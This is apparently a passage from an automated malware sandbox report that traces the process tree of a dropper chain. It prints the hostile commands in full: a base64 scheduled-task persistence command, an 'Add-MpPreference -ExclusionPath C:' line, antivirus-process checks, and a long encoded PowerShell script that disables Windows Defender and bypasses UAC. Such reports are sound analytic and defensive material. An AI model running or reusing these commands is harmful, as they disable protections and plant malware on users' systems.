UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBzAHkAcwB0AGUAbQB2AGUAbgAuAGUAeABlACcAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAcwB5AHMAdABlAG0AdgBlAG4ALgBlAHgAZQAnACkAIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAA1ACkAKQAgAC0AVQBzAGUAcgAgACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBTAGUAYwBvAG4AZABzACAAMAApACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwApACAALQBGAG8AcgBjAGUA8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206660101\gtjFHJI.exe"C:\Users\Admin\AppData\Local\Temp\10206660101\gtjFHJI.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206670101\Go7yA2t.exe"C:\Users\Admin\AppData\Local\Temp\10206670101\Go7yA2t.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\""8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1916 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'9⤵PID:564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"9⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:3852 -
C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe"C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe" ""10⤵
- Executes dropped EXE
PID:456
-
-
C:\Users\Admin\AppData\Local\Temp\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe"C:\Users\Admin\AppData\Local\Temp\\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe" "{5A4A035D-A4F9-454A-85ED-D5727334CF26}"10⤵
- Executes dropped EXE
PID:2028
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206680101\9CQknW9.exe"C:\Users\Admin\AppData\Local\Temp\10206680101\9CQknW9.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 2248⤵
- Program crash
PID:4052
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206690101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10206690101\HmngBpR.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:12908 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:13032 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:13144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:13240 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe11⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:9480
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206700101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10206700101\zY9sqWs.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1724
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206710101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10206710101\ADFoyxP.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat8⤵
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat9⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:5784
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6208
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"9⤵
- System Location Discovery: System Language Discovery
PID:5172
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530909⤵
- System Location Discovery: System Language Discovery
PID:6804
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub9⤵
- System Location Discovery: System Language Discovery
PID:6872
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good9⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com9⤵
- System Location Discovery: System Language Discovery
PID:5632
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m9⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4720 -
C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 142811⤵
- Program crash
PID:7248
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206720101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10206720101\9JFiKVm.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Users\Admin\AppData\Roaming\D9ohTv4jcH.exe"C:\Users\Admin\AppData\Roaming\D9ohTv4jcH.exe"9⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:6728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBc